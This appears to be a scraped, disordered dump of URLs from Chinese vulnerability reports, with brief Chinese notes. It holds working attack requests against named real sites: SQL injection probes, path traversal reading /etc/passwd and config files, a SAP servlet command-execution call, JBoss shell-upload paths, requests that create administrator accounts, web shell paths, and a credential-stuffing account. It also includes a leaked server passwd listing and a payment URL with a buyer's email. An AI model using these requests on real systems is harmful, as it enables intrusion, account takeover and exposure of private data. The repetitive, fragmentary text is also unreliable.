http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://www.**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://www.**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://**.**.**.**/cctrl/admin/news/contShow.php?id=2 http://221.8.57.110/i-card/k8cmd.jsp http://221.8.57.110/i-card/one8.jsp http://221.8.57.110/i-card/one.jsp http://221.8.57.110/i-card/help.jsp http://**.**.**.**/coremail/index.jsp?cus=1 http://www.3hk.cn/index.php?action=alipay&ctr=simplepay http://**.**.**.**:80/frontpage/company.jsp?gqhxId=880018*&menuPath=GQHQ http://www.c3crm.com http://www.c3crm.com/bbs http://www.c3crm.com/bbs/bbs.zip http://**.**.**.**/Corder.asp?act=11&msg=%E8%B3%87%E6%96%99%E4%B8%8D%E6%AD%A3%E7%A2%BA http://**.**.**.**:20022/iss_amwebins/ec/alltrustcard/cardRegister.jsp http://**.**.**.**:20022/iss_amwebins/servlet/FileLookServlet?upfileurl=/etc/passwd http://votegd.gridinn.com/phpmyadmin http://cytsadm.hszw.com/ http://oa2.xiaoniu66.com:5081/login.jsp http://oa1.xiaoniu66.com:7890/easoa/themes/mskin/login/login.jsp http://qcdds.dongfeng-nissan.com/ http://118.244.195.24/ http://**.**.**.**:81/defaultroot/login.jsp,是安徽省农村信用社联合社网站(http://**.**.**.**/)的后台管理系统,验证码设计存在缺陷,抓包发现只要“thisRand”和“srand”参数一致就可以实施撞库,用人名拼音和弱口令111111可获取8个有效账号,某个账号duyf登陆后发现是个超级管理员,权限很大,能对内容管理、扩展功能、互动功能、发布管理、模板库管理、站点配置等等进行操作,能分配其它管理员权限。 http://**.**.**.**:7011/iss_dbwebins/ec/alltrustcard/cardRegister.jsp http://**.**.**.**/bugs/wooyun-2010-0123155 http://**.**.**.**:7011/is/index.jsp http://**.**.**.**:7011/ceshi/a.jsp?sort=4&file=%2Fdata%2Fwls10_mp1%2Fuser_projects%2Fdomains%2Fiss_domain%2Fservers%2F3%2Fupload%2FISS_DBWEBINS_20140917%2FWEB-INF%2Fweb.xml http://group.gome.com.cn/ http://manage.group.gome.com.cn/ http://119.254.70.190/phpinfo.php http://rmp.haier.net/phpmyadmin/,发现服务器运行phpmyadmin,为xampp集成,其中mysql code.csdn.net/openyp/search_open_figure?key=1&utf8=%e2%9c%93 http://**.**.**.**/ www.cema.org.cn)是目前国内挖掘机行业最大、最专业的互联网企业。自其创立以来始终秉承“以资讯创造价值”的理 http://vip.zhaogang.com/,登陆处存在撞库,可获得一些有积分的账号,10积分=1元,威胁用户积分安全。 http://**.**.**.**/ https://github.com/yinzhijian/z2c/blob/0e9e598efca7fcc6dc98c41f5cc6db7609093701/classes/WeixinOrder.php http://**.**.**.**/web2/login_template/11.html http://tc.changhong.com/metrology/jl.aspx?type=chemistry https://mail.ceair.com https://sslvpn.ceair.com http://**.**.**.**/artshow.do?ID=134 http://**.**.**.**/artshow.do?ID=134 http://**.**.**.**/artshow.do?ID=134 http://**.**.**.**/artshow.do?ID=134 http://**.**.**.**:80/ file://,也可以iframe file://可执行文件时候会直接执行 http://**.**.**.**:80/ https://**.**.**.**/iFaxUserInterface/lostPasswd.action http://**.**.**.**/user/getUserBySid/?username=xxxxx获取到自己账户的id,然后通过如下页面使用id遍历用户名 http://my.tesla.cn/alipayreturnfp?body=Model+S&buyer_email=zhaoyue%40aijoy.net&buyer_id=2088311949415681&exterface=create_direct_pay_by_user&extra_common_param=6dchu9miajons9spqjufjie643&is_success=T¬ify_id=RqPnCoPT3K9%252Fvwbh3InVam4xme%252B9DwHRJxOFelUF1eRvMkXXYfg5oUb6Qw300wMz7swL¬ify_time=2015-10-07+23%3A52%3A00¬ify_type=trade_status_sync&out_trade_no=[支付RN号]&payment_type=1&seller_email=chinafinancesz%40teslamotors.com&seller_id=2088611024475284&subject=Tesla&total_fee=132000.00&trade_no=2015100721001004280023329978&trade_status=TRADE_SUCCESS&sign=8a920df1e7fd9b104e2c61903380c775&sign_type=MD5 https://exmail.qq.com/cgi-bin/geturlinfo?sid=【你的sid】&url=http%3A%2F%2F10.130.186.11/&pageid=compose http://wwwtest.fuiou.com:8992/fuMer/login.action https://mail.fuiou.com http://pass.tom.com/login.php http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2015-0144565 http://**.**.**.**/demo/tologin.action http://**.**.**.**/bugs/wooyun-2015-0144565 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:8088/ http://**.**.**.**/ http://**.**.**.**:8000/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.huaweihcc.com http://www.huaweihcc.com/iframe.jsp?bar=mediaPicture&id=3&categoryId=PIC_SCENE http://www.ncmg2010.sdu.edu.cn/admin/ ygc:x:510:510:医管处:/home/ygc/./wwwroot:/sbin/nologin ipo:x:511:511::/home/ipo2/./wwwroot:/sbin/nologin bioinfo:x:512:512::/home/bioinfo/./wwwroot:/sbin/nologin zzzx:x:513:513::/home/zzzx1/./wwwroot:/sbin/nologin cie:x:514:514::/home/cie/./wwwroot:/sbin/nologin cmhi:x:515:515::/home/cmhi/./wwwroot:/sbin/nologin wljy:x:516:516::/home/wljy/./wwwroot:/sbin/nologin sp:x:517:517::/home/sp/./wwwroot:/bin/nologin blsl:x:518:519::/home/blsl/./wwwroot:/sbin/nologin cmse:x:519:520::/home/cmse/./wwwroot:/sbin/nologin fls:x:520:521::/home/fls/./wwwroot:/sbin/nologin infosec:x:521:522::/home/infosec/./wwwroot:/sbin/nologin japanlawinfo:x:522:523::/home/japanlawinfo/./wwwroot:/sbin/nologin yjsh:x:523:524::/home/yjsh/./wwwroot:/sbin/nologin mbmr:x:524:525::/home/mbmr/./wwwroot:/sbin/nologin icm:x:525:526::/home/icm/./wwwroot:/sbin/nologin lhp:x:526:527::/home/lhp/./wwwroot:/sbin/nologin gfy:x:528:529:国防院:/home/gfy/./wwwroot:/sbin/nologin caolh:x:529:530::/home/caolh:/bin/bash qlng:x:531:533:齐鲁医院农工党:/home/qlng/./wwwroot:/bin/nologin xyy:x:532:534:校医院:/home/xyy/./wwwroot:/bin/nologin summer:x:533:535:教务处暑期学校:/home/summer/./wwwroot:/bin/nologin art:x:534:536:艺术学院:/home/art/./wwwroot:/bin/nologin fbjf:x:535:537:数学学院复变积分:/home/fbjf/./wwwroot:/bin/nologin cah:x:536:538:土建与水利实验教学示范中心:/home/cah/./wwwroot:/bin/nologin jjh:x:537:539:教育基金会:/home/jjh/./wwwroot:/bin/nologin jgdw:x:538:540:机关党委:/home/jgdw/./wwwroot:/bin/nologin njournal:x:539:541:学报:/home/njournal/./wwwroot:/bin/nologin njournal1:x:540:542:xuebao:/home/njournal1/./wwwroot:/bin/nologin njournal2:x:541:543:xuebao:/home/njournal2/./wwwroot:/bin/nologin njournal3:x:542:544:xuebao:/home/njournal3/./wwwroot:/bin/nologin njournal4:x:543:545:xuebao:/home/njournal4/./wwwroot:/bin/nologin vhost2:x:544:546::/home/vhost2/./wwwroot:/bin/nologin wszyjy:x:545:547:文史哲研究院:/home/wszyjy/./wwwroot:/bin/nologin ppcb:x:546:548:品牌与传播研究所:/home/ppcb/./wwwroot:/bin/nologin xwgk:x:547:549:校办的校务公开网:/home/xwgk/./wwwroot:/bin/nologin hqc:x:548:550::/home/hqc/./wwwroot:/bin/nologin crystal:x:549:551::/home/crystal/./wwwroot:/bin/nologin camm:x:550:552::/home/camm/./wwwroot:/bin/nologin huanke:x:551:553:huanjingkexueyuan:/home/huanke/./wwwroot:/bin/nologin wxl:x:552:554::/home/wxl:/bin/bash skc:x:553:555::/home/skc2/./wwwroot:/bin/nologin cbs:x:554:556::/home/cbs/./wwwroot:/bin/nologin zzgc:x:555:557::/home/zzgc/./wwwroot:/bin/nologin plaoffice:x:556:558::/home/plaoffice/./wwwroot:/bin/nologin xzxx:x:557:559:党委学校办公室:/home/xzxx/./wwwroot:/bin/nologin sdutc:x:558:560:土建与水利学院交通规划研究中心:/home/sdutc/./wwwroot:/bin/nologin bgs:x:559:561:校办:/home/bgs/./wwwroot:/bin/nologin sdeac:x:561:563:经济学年会:/home/sdeac/./wwwroot:/bin/nologin rie:x:562:564:产业经济评论:/home/rie/./wwwroot:/bin/nologin zscq:x:563:565:科技处知识产权网:/home/zscq/./wwwroot:/bin/nologin mla:x:564:566:图像处理与模式识别研究组:/home/mla/./wwwroot:/bin/nologin rcsm:x:565:567:可持续制造研究中心:/home/rcsm/./wwwroot:/bin/nologin nwhxq:x:566:568:南外环新区:/home/nwhxq/./wwwroot:/bin/nologin plant:x:567:569::/home/plant/./wwwroot:/bin/nologin emba:x:568:570::/home/emba/./wwwroot:/bin/nologin art2:x:569:571::/home/art2/./wwwroot:/bin/nologin bxmyeast:x:570:572:酵母遗传学及分子生物学课题组:/home/bxmyeast/./wwwroot:/bin/nologin jj:x:571:573:基建处:/home/jj/./wwwroot:/bin/nologin yjfz:x:572:574:幼儿教育发展中心:/home/yjfz/./wwwroot:/bin/nologin xxgk:x:573:575:信息公开:/home/xxgk/./wwwroot:/bin/nologin me:x:575:577:管理学院工程硕士教育中心:/home/me/./wwwroot:/bin/nologin korea:x:576:578:朝鲜语系:/home/korea/./wwwroot:/bin/nologin ieet:x:578:580:产业经济研究所:/home/ieet/./wwwroot:/bin/nologin function:x:579:581:医学院机能教学实验室:/home/function/./wwwroot:/bin/nologin media:x:580:582:宣传部宣传科:/home/media/./wwwroot:/bin/nologin nprmeeting:x:581:583:药学院npr会议:/home/nprmeeting/./wwwroot:/bin/nologin gsp:x:582:584:加拿大高等教育:/home/gsp/./wwwroot:/bin/nologin lcyxtszy:x:583:585:医学院本科教育:/home/lcyxtszy/./wwwroot:/bin/nologin eera:x:584:586:能效研究:/home/eera/./wwwroot:/bin/nologin mbbs:x:585:587:医学院临床留学生:/home/mbbs/./wwwroot:/bin/nologin dcd:x:586:588:合作发展部:/home/dcd/./wwwroot:/bin/nologin arrc:x:587:589:经济学院:/home/arrc/./wwwroot:/bin/nologin mti:x:588:590:外国语学院翻译硕士管理中心:/home/mti/./wwwroot:/bin/nologin gnhz:x:589:591:合作发展部国内合作办公室:/home/gnhz/./wwwroot:/bin/nologin ncmg2010:x:590:592:医学院遗传所:/home/ncmg2010/./wwwroot:/bin/nologin http://www.ncmg2010.sdu.edu.cn还存在任意文件下载漏洞, http://www.ncmg2010.sdu.edu.cn/downloadfile.php?path=../admin/config.php http://www.jjl.cn/jjl.tar.gz http://**.**.**.**/ http://**.**.**.**/Pages/Admin/SysAdmin.aspx?Id=1 http://**.**.**.**/Pages/User/UserHome.aspx http://**.**.**.**/App_Upload/Document/ http://pk.tom.com/web/forgot/sendGetPwdMail.jsp?email=1 https://github.com/cheng-ran/tonxon/blob/3b1715ddd0488b0fef76cdc6731eac0649ea1158/ROOT/WEB-INF/classes/Configuration.xml http://m.class.cn http://**.**.**.**/ http://**.**.**.**/People/Professor/individual.php?TeacherID=T9434 http://**.**.**.**/People/Professor/individual.php?TeacherID=T9434 http://www.qmango.com/ThirdPartLogin/qqcaibei/speclist.asp?id=108%20and%201=1 http://**.**.**.** http://**.**.**.**/new_2.asp?id=50 http://**.**.**.**/dizhi_1.asp?id=1 https://reg.fuiou.com/findUserPassword.action http://t.hrsec.com.cn/upload/software/%E5%8D%8E%E8%9E%8D%E7%94%9F%E4%BA%A7%E6%B5%8B%E8%AF%95%E8%AF%B4%E6%98%8E.txt http://admin.iask.sina.com.cn/api/.svn/entries http://admin.iask.sina.com.cn/data/.svn/entries http://admin.iask.sina.com.cn/images/.svn/entries http://admin.iask.sina.com.cn/admin/.svn/entries http://admin.iask.sina.com.cn/css/admin/.svn/entries https://svn1.intra.sina.com.cn/vdisk/audit/adminManage23/htdocs/admin https://svn1.intra.sina.com.cn/vdisk svn:special svn:externals svn:needs-lock http://hwnet.cnhubei.com/ http://**.**.**.**:8080/govinfo/index.htm http://**.**.**.**/xinwen/xinwen.asp?id=1444这个链接的id处存在sql注入漏洞。 http://**.**.**.**/xinwen/xinwen.asp?id=1444 http://**.**.**.**/xinwen/xinwen.asp?id=1444/**/AND www.luckyxp.net http://www.andaijia.cn/apply/introduction/id/46 http://www.andaijia.cn/apply/index/id/24 http://**.**.**.**/main_news.php?seq=31 http://www.brim28.com/tc/shop_f.php?i=111 http://www.brim28.com/tc/shop_f.php?i=111 http://**.**.**.**:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://crmxid.hisense.com:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe http://cemftp.ce-air.com/yyoa/checkWaitdo.jsp?userID=1 view-source:http://cemftp.ce-air.com/yyoa/common/SelectPerson/reloadData.jsp http://cemftp.ce-air.com/yyoa/assess/js/initDataAssess.jsp http://192.168.1.8:9182/request?action=startapp&app=com.android.chrome http://192.168.1.8:9182/request?action=showtoast&content=文本内容 http://192.168.1.8:9182/request?action=install&url=http://file-bak.liqucn.com/upload/2015/qipai/qyw_1.4.7_2200126314.apk&name=123 http://192.168.1.8:9182/request?action=appslist http://192.168.1.8:9182/request?action=getbdid http://**.**.**.**/Web_Org/St_Info.aspx?typeid=3 http://**.**.**.**/Web_Org/St_Info.aspx?typeid=3 http://**.**.**.**/Web_Org/St_Info.aspx?typeid=3 http://**.**.**.**/Web_Org/St_Info.aspx?typeid=3 http://**.**.**.**/Web_Org/St_Info.aspx?typeid=9 http://**.**.**.**/query/index.asp http://**.**.**.** http://**.**.**.**/viewpages_main/ShowViewPagesThird.do?fcid=1ef635ad-95cd-4e73-b389-0929dc9b740d&classId=7c9a2258-f8d5-44c0-a008-8b078f718127 http://**.**.**.**/b1-1.php?nid=1138 http://i.chaoxing.com/24183374 http://**.**.**.**/bugs/wooyun-2015-0137380在该版本中也存在,可用来给低权限帐号提升权限。 http://**.**.**.**/jiaowu/jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu/jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu_2008/jwgl/jxjh/jxjha.asp http://**.**.**.**/jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu_2008/jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu//jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu//jwgl/jxjh/jxjha.asp http://**.**.**.**:8181/jwgl/jxjh/jxjha.asp http://**.**.**.**/jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu/jwgl/jxjh/jxjha.asp http://**.**.**.**/jwgl/jxjh/jxjha.asp http://**.**.**.**/jiaowu_2008/jwgl/jxjh/jxjha.asp http://cp.luckyxp.net/ http://healthadmin.jxdyf.com/ http://**.**.**.**/ http://**.**.**.**/ http://170.youku.com/MVNO-OBH/orderquery/getOrderInfo http://**.**.**.**/tc/latestnews_events/latest_news_detail.html?id=2365 http://**.**.**.**/bugs/wooyun-2010-063832 http://**.**.**.**:7001/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp http://**.**.**.**:7001/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp http://**.**.**.**/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp http://**.**.**.**:88/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../public/edit/jsp/config.jsp http://**.**.**.**/ http://smartvideo.youku.com/ http://www.yingke.tv/Shop/ShopDetail.aspx?id=1103 http://www.yingke.tv/NewsList.aspx?cityid=11&type=1 http://123.125.17.201:7070/cc/portal.jsp http://123.125.17.201:7070/cc/login.do?method=modifyPassword http://182.92.225.109:9999/management/status.jsp http://42.62.53.93/mag-delivery/ http://42.62.53.93/invoker/JMXInvokerServlet上传shell http://42.62.53.93/jbossws13/index.jsp http://**.**.**.**/ https://mp.weixin.qq.com/cgi-bin/home?t=home/index&lang=zh_CN&token=1037067635 http://218.58.70.201/haier/ http://218.58.70.201/invoker/JMXInvokerServlet admin:service=DeploymentFileRepository http://218.58.70.201/myname/test1.jsp http://116.6.67.208/hr/list.html?i_type=30 http://116.6.67.208/hr/list.html?i_type=30’” http://116.6.67.208/hr/list.html?i_type=30%27 http://116.6.67.208/hr/list.html?i_type=30%27 http://oa.copm.com.cn/ http://mail.copm.com.cn/ http://**.**.**.**/bugs/wooyun-2010-061802 http://**.**.**.**/article.asp?articleid=3195 http://**.**.**.**/article.asp?articleid=770 http://**.**.**.**/article.asp?articleid=6045 http://**.**.**.**/article.asp?articleid=1383 http://**.**.**.**/article.asp?articleid=1818 www.zip http://**.**.**.**/index.php?m=admin&c=index&pc_hash=qUWWio http://**.**.**.**/ http://**.**.**.**/ http://www.cn357.com/login_1 http://sqlmap.org http://www.yumazu.com.cn/uc_server/admin.php http://m.class.cn http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=360&adminpassword=111111&guid=1_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://**.**.**/Isv.ashxaction=addadmin&adminuser=admin1&adminpassword=111111&guid=2_ http://m.haodai.com/guilin/ http://www.tddx.cn/ URLhttp://61.233.14.172/D:%5C/ http://oa.erdosgroup.cn/ http://www.econ.sdu.edu.cn/bkjx/list_art.php?id=75995&sortid=199 http://travel.go.qq.com/v2/home.html ip:12580/?action=PlayPushUrl之类的调用 www.class.cn http://www.class.cn http://**.**.**.**/ http://**.**.**.**:8001/console/login/LoginForm.jsp http://ptrack.sundns.com/viewfaq.php?faqid=120 http://bbs.59store.com/.git/服务器返回403说明文件存在,接下来用上git神器,获得所有的源码 jdbc:oracle:thin:@**.**.**.**:1521:wddb01 http://oa.yogi.com.cn/yyoa/ http://oa.yogi.com.cn/yyoa/checkWaitdo.jsp?userID=1 http://oa.yogi.com.cn/yyoa/common/js/menu/test.jsp?doType=101&S1=* http://oa.yogi.com.cn/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=-1 http://oa.yogi.com.cn/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=* http://oa.yogi.com.cn/yyoa/ext/trafaxserver/ToSendFax/messageViewer.jsp?fax_id=1 http://oa.yogi.com.cn/yyoa/ext/trafaxserver/ReceiveFax/messageViewer.jsp?fax_id=1 http://oa.yogi.com.cn/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://116.236.239.102/servlet/com.zotn.screens.HomeProxyServlet http://116.236.239.102/%20../web-inf/ http://112.64.153.38/servlet/com.zotn.screens.HomeProxyServlet http://piao.21edu.com/ http://staff.xueda.com/staff/home http://dashboard2.xueda.com/ Host:fantasica.mobage.cn http://fantasica.mobage.cn/home http://ehr.ele.me:9004/portal http://act.rajax.me/ http://**.**.**.**/Web_Org/Ddcb_View.aspx?infoid=58 http://**.**.**.**/Web_Org/Ddcb_View.aspx?infoid=97 http://**.**.**.**/web_Org/About_Us.aspx?infoid=a http://**.**.**.**/Web_Org/About_Us.aspx?infoid=a http://**.**.**.**/Web_Org/Qa_Quert_List.aspx?info=4123 http://**.**.**.**/Web_Org/Qa_Quert_List.aspx?info=4139 http://**.**.**.**/Web_Org/Qa_Quert_List.aspx?info=4126 http://**.**.**.**/Web_Org/Course_Face_Info.aspx?infoid=2 http://**.**.**.**/Web_Org/Course_Face_Info.aspx?infoid=4 http://**.**.**.**/pro/product.html http://oa.baixiangfood.com/ http://**.**.**.**/bugs/wooyun-2010-0116998 http://**.**.**.**/oa/Flower/Action.aspx?action=GETINFO&id=1'/**/and/**/@@version=1-- http://**.**.**.**/bugs/wooyun-2010-0116998 http://**.**.**.**/oa/OA_QuickLogin.aspx?info=1'/**/and/**/@@version=1/**/and/**/'a'='a,520 http://**.**.**.**,利用EXP如下 http://**.**.**.**/oa/Js/jquery.uploadify.aspx http://www.zzidc.com/main/member/initForgetPasswd.html index.php/api/testdriveapi?0.5837047907939267 http://**.**.**.** http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0 http://**.**.**.**/nckm/english/HomeStyle.aspx?Type=11&ContentPage=0 www.UserAccount http://**.**.**.**/ http://**.**.**.**/ http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%27 http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20and%20@@version http://shop1.maticsoft.cn//NodeProdCategory.aspx?action=GetChildNode&CategoryId=2%20and%20user http://www.syltmall.com/NodeProdCategory.aspx?action=GetChildNode&CategoryId=1 http://**.**.**//NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1& http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=2%20and%20@@version http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ http://**.**.**/NodeProdCategory.aspxaction=GetChildNode&CategoryId=1%20and%20@@version%3E0--_ 